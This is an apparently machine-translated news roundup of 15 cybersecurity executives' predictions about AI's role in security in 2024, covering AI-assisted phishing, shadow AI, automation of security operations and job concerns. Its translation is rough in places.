15 influencers predict that AI will be a game changer for cybersecurity in 2024

Mondo games Updated on 2024-01-31

Will AI lead to mass job losses for cybersecurity personnel?What are the new threats and challenges posed by generative AI?Can cybersecurity "beat magic with magic" and benefit from AI technology?

With the breakthrough development of AI technology, attackers are accelerating the adoption of AI, combined with social engineering technology to make it difficult for enterprises to prevent itAt the same time, on the defensive side, AI is also the key for CISO to win the AI arms race**.

How will AI change the game for cybersecurity in 2024?Recently, VentureBeat interviewed 15 cybersecurity leaders from 13 companies to summarize their thoughts on 2024. Respondents generally agreed that the top goal for CISOs in 2024 is to build security personnel and AI and partnerships. AI requires human insight to realize its full potential to defend against cyberattacks, and here are the top points of security experts:

Artificial intelligence brings improvements and challenges in detection capabilities

Peter Silva, Cyber Security Division, Ericom

Pattern recognition capabilities of AI can be used to improve detection capabilities (e.g. new attack patterns or CVE vulnerabilities, including attack attempts, or even an L3DDoS attack that is covering for an inadvertent credential stuffing attack). But at the same time, AI will also make detection more difficult, for example, detectors cannot distinguish between human phishing attacks and AI-generated phishing attacks, which will facilitate the continuous development of detection technology.

Shadow AI and large-scale model deployment bring new data security risks

Elia Zaitsev, CTO of Crowdstrike

Crowdstrike expects that by 2024 attackers will shift their attention to AI systems as the latest threat vector, attacking targeted organizations through vulnerabilities in approved AI deployments and blind spots in employees' unapproved use of AI tools (shadow AI).

Security teams' knowledge of AI threat models and monitoring employee shadow AI is still in its early stages, and these blind spots and new technologies open the door for threat actors eager to infiltrate corporate networks or access sensitive data. Employees who use new AI tools without the supervision of a security team will create a new risk of data leakage for companies.

Over-reliance on AI has led to a lack of oversight of security operations

Rob Gurzeev, CEO of Cycognito

Generative AI will have a positive impact on security, but it also comes with a huge risk: AI can make security teams too complacent, which is dangerous. Over-reliance on AI can lead to a lack of oversight of an organization's security operations, which can easily create vulnerabilities in the attack surface. Don't think that once AI becomes smart enough, it can reduce its reliance on human insight, it's actually a "slippery slope".

AI can help companies improve their defense response speed

Howard Ting, CEO of Cyberh**EN

Cyberh**en's survey data earlier this year showed that 47% of employees have pasted confidential data into ChatGPT, and 11% of that data is sensitive. But things will eventually turn for the better, and as large language models and generative AI mature, security teams will be able to use it to accelerate defenses.

Generative AI improves the availability of security big data

John Momorello, co-founder and CTO of Gutsy

Generative AI has tremendous potential to help security teams efficiently process massive amounts of incident data. Traditional methods of data lakes and SIEMs simply collect data and do little to make it easy to use, and conversational AI can greatly improve the usability of data.

Generative AI lowers the barrier to entry for critical infrastructure attacks

Jason Urso, Chief Technology Officer, Honeywell Connected Enterprise

Critical infrastructure has always been a prime target for malicious actors. Previous successful attacks involved sophistication beyond the capabilities of the average hacker. However, generative AI lowers the barrier to entry, allowing less experienced hackers to generate malware, launch sophisticated phishing attacks to gain access to systems, and perform automated penetration testing.

The threat landscape of critical infrastructure is evolving into artificial intelligence (AI) defense.

On the defensive side of critical infrastructure, generative AI will be used as a closed-loop OT defense approach – dynamically changing security configurations and firewall rules as the threat landscape changes, and performing automated penetration testing to understand risk changes. ”

AI doesn't mean cybersecurity talent will be out of work

Srinivas Mukkamala, Chief Product Officer, Ivanti

In 2024, many employees will be more worried about the impact of AI on their careers. For example, recent research found that nearly two-thirds of IT employees are concerned that AI will replace their jobs in the next five years. Business leaders need to be clear and transparent with their employees about how they plan to implement AI in order to retain talented employees – because reliable AI requires human oversight.

In addition, AI will generate more sophisticated social engineering attacks. By 2024, the increasing availability of AI tools will make social engineering attacks more accessible. As companies become more and more adept at detecting traditional phishing emails, hackers have turned to new technologies to improve the credibility of phishing emails. In addition, misinformation created by bad actors using AI tools will pose a real threat to organizations, **, and society as a whole.

Generative AI will change the nature of work in cybersecurity roles

Merritt Baer, CIO at Lacework

Robots won't take over security jobs, but they will change the nature of cybersecurity work. Many security professionals are already using AI to automate repetitive tasks, but what if they go one step further?If generative AI can not only prompt you to write an automated program ("This is a problem you've seen x times this week request;Do you want to automate it?And it can also give you what to do if you need to do that (e.g. write a vulnerability mitigation or patch). I anticipate that the ultimate value of cybersecurity jobs will be in line with Adalovelace, the godmother of computer programming, who foresaw that human creativity and innovative thinking is essential;Computers excel at reliable processing, deriving patterns from large data sets and performing actions with mathematical accuracy. ”

AI helps security teams keep up with development

Ankur Shah, Senior Vice President, Prisma Cloud, Palo Alto Networks

Today's security teams are unable to keep up with the pace of application development, resulting in a myriad of security risks in production environments. Unfortunately, app development is accelerating, with more and more developers using AI to write and release new apps quickly, and AI will speed up app development by more than 10 times in the near future. To level the playing field for security teams to keep up, enterprise security needs to turn to artificial intelligence. Finally, AI is primarily a data issue, and if you don't have robust security data to train AI, then your ability to stop risks will lag.

Generative AI creates a versatile security analyst

Matt Kraning, CTO of Palo Alto Networks Cortex

Today, security analysts must be all-around unicorns, understanding not only how attackers can compromise but also how to set up complex automations and queries to efficiently handle massive amounts of data. Now, generative AI will make it easier for security analysts to interact with data.

Artificial intelligence is a key capability in detecting phishing emails

Christophe van de Weyer, CEO of Telesign

Fraudsters are using AI technology to scale up their attacks, such as using AI-generated deepfake voice or writing styles to increase success rates, which has led to a new all-time record number of phishing emails in 2023. By 2024, consumers will have a hard time discerning fraudulent emails and text messages, which will force businesses to tighten their defenses and focus more on account integrity, as phishing is often used to take over accounts and perform more significant thefts. Businesses should use artificial intelligence to risk score logins and transactions based on continuous analysis of fraud signals. Cybersecurity firms should expand the learning of fraud signals from machine learning to provide high-quality information for email security programs.

AI will solve the challenges of threat detection, classification, and response

Rob Robinson, Head of Telstra Purple EMEA

Today, the number of data points that cybersecurity professionals are responsible for monitoring and managing is staggering. With the proliferation of the cloud and the intelligent edge, this will only intensify in the coming years. AI technology is ideally suited to solve some of the security industry's most difficult problems in threat detection, classification, and response. So, by 2024, we will see the necessary skills needed for AI to transform CISOs again.

Generative AI will increase the level of automation of security operations across the board

Vineet Arora, CTO of Winwire

Generative AI will dramatically enhance cybersecurity operations management capabilities. AI will enable more automation in currently human-managed security workflows such as threat intelligence, security hardening, penetration testing, and inspection engineering. Many routine tasks such as log analysis, incident response, and security patching can be automated with generative AI, freeing up valuable time for security analysts to focus on more complex cybersecurity issues. At the same time, attackers use generative AI to create highly "realistic" scenarios for social engineering attacks, malware cloaking, and sophisticated phishing campaigns.

Generative AI dramatically improves compliance efficiency

Claudionor Coelho, Chief Artificial Intelligence Officer, Zscaler, and Sanjay Kalra, Vice President of Product Management

Generative AI will have a significant and far-reaching impact on compliance in 2024. Historically, compliance has been a time-consuming endeavor, including developing regulations, enforcing restrictions, obtaining evidence, and answering customer questions. This is mainly focused on text and programs, and generative AI will greatly increase its level of automation.

Related Pages